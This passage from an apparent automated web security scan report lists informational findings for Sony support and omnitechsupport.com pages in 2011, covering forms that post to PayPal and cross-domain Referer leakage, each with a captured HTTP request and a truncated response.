<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.15. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.16. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.17. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.18. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.19. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.20. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.21. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<tr>
                   <form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<td width="254" rowspan="2" align="center" valign="middle">
...[SNIP]...

9.22. http://www.omnitechsupport.com/spyware_removal.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /spyware_removal.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /spyware_removal.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.3.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42222

<html>
<head>
<title>Spyware Removal | Spyware Adware Remove</title>
<meta name="description" content="Omnitechsupport.com offers complete 24/7 spyware removal services and effective spyware adware
...[SNIP]...
<td valign="top">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.23. http://www.omnitechsupport.com/spyware_removal.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /spyware_removal.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /spyware_removal.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.3.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42222

<html>
<head>
<title>Spyware Removal | Spyware Adware Remove</title>
<meta name="description" content="Omnitechsupport.com offers complete 24/7 spyware removal services and effective spyware adware
...[SNIP]...
<tr>
                   <form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<td width="254" rowspan="2" align="center" valign="middle">
...[SNIP]...

10. Cross-domain Referer leakage
There are 12 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


10.1. http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sonystyle.custhelp.com
Path:   /cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php?source= HTTP/1.1
Host: sonystyle.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:29 GMT
Server: Apache
RNT-Time: D=91958 t=1308842369134448
RNT-Machine: 06
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15094

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightnow.com/crm/document">
<head>
<script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></scr
...[SNIP]...
<td class="bevel" valign="top" colspan="2">
<a href="http://esupport.sony.com/US/perl/model-accessories.pl" id="click_here" name="click_here">Click here</a>
...[SNIP]...

10.2. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cyberghostvpn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.131.25
X-Cnection: close
Date: Thu, 23 Jun 2011 15:25:28 GMT
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/6KGjlCsCWCK.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/fKYLFU6W_MM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/Juua_Gv7yKY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/XhueOm5bqOx.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/PD7V_khohjs.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/NMbCdi3OCeH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/SogayxsfDSh.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/cyberghostvpn" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187912_196942217311_3952230_q.jpg" alt="CyberGhost VPN" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/hapo06" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202955_1178794230_6332749_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/iqbalisbac" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211512_100000329032400_559174_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Bivolty" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202967_100001269761876_1508747_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002209408909" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187225_100002209408909_2774726_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/kingofhawks" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002201855098" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202909_100002201855098_1458152_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_1313402717_8830_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/RuRoller" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186140_1481145205_634764_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

10.3. http://www.omnitechsupport.com/sony/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /sony/index.php

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /sony/index.php?queue=ComputerPFS&OWChat=1&VARSET_MODELNUM=VGNNR180E HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.docs.sony.com/startchat.asp?modelnum=VGNNR180E&chat=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:59:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Set-Cookie: model=VGNNR180E; expires=Sat, 23-Jul-2011 14:59:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div id="topleftlogo">
           <img src="http://esupport.sony.com/graphics/site/sonylogo.jpg" width="85" height="15" border="0">
   </div>
...[SNIP]...
<div id="globalhome" ><A HREF="http://esupport.sony.com" onMouseOver=" window.status='Click here to visit Sony Electronics Support and Registration.'; return true" onMouseOut="window.status=' '; return true">
        <img src="http://esupport.sony.com/graphics/site/logo_small.jpg" border="0">
</div>

   <div id="globalhome4" >
       <A HREF="http://esupport.sony.com" onMouseOver=" window.status='Click here to visit Sony Electronics Support and Registration.'; return true" onMouseOut="window.status=' '; return true">Sony Support Home</a>
...[SNIP]...
<div id="bottomlinks">
       <a href="http://www.sony.net/SonyInfo/Support/" target="_self" onMouseOver=" window.status='Go to the Sony Global Home page.'; return true" onMouseOut="window.status=' '; return true" title="Locate Sony Support for other areas of the world."><img src="http://esupport.sony.com/graphics/site/globalhome.gif" width="78" height="9" border="0"></a>&nbsp;
       <A onmouseover=" window.status='Go to Sony Support.'; return true" onmouseout="window.status=' '; return true" href="http://esupport.sony.com/US/perl/index.pl?template_id=1" target=_self>Support Home</A>&nbsp;
       <a href="http://esupport.sony.com/US/perl/contact-land.pl?template_id=1" target="_self" onMouseOver=" window.status='Contact Sony Support.'; return true" onMouseOut="window.status=' '; return true">Contact Support</a>
       <A onmouseover=" window.status='Go to Sony.com.'; return true" onmouseout="window.status=' '; return true" href="http://www.sony.com/index.php?CMP=M:footer:esupport" target="_self">Sony.com</A>
...[SNIP]...
</A>&nbsp;
       <A style="border-right: 0px;" onmouseover=" window.status='Go to Sony Business Solutions.'; return true" onmouseout="window.status=' '; return true" href="http://b2b.sony.com/" target="_self">Business Solutions</A>
...[SNIP]...
<div id="playimgright">
       <a href="http://www.sony.com/index.php?CMP=M:footer:esupport"><img src="http://esupport.sony.com/graphics/site/sonyplay.gif" width="68" height="36" border="0"></a>
...[SNIP]...
<br />
            <a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_self">Privacy Policy/Your California Privacy Rights</a>&nbsp;|&nbsp;<a href="http://products.sel.sony.com/SEL/legal/notice.html" target="_self">Legal/Trademark</a>
...[SNIP]...

10.4. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?storeId=10151&catalogId=10551&langId=-1&categoryId=8198552921644643900 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 129492
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:01 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 129492


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<link rel="canonical" href="http://www.sonystyle.com/c/Backstage-Services/e
...[SNIP]...
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<p class="serviceDetails secondParagraph">
<a class="redArrowLink" href="https://sony.support.com/download/VAIO_PC_Health_Check_EN.exe">Run VAIO Health Check</a>
...[SNIP]...
<p class="serviceDetails secondParagraph">
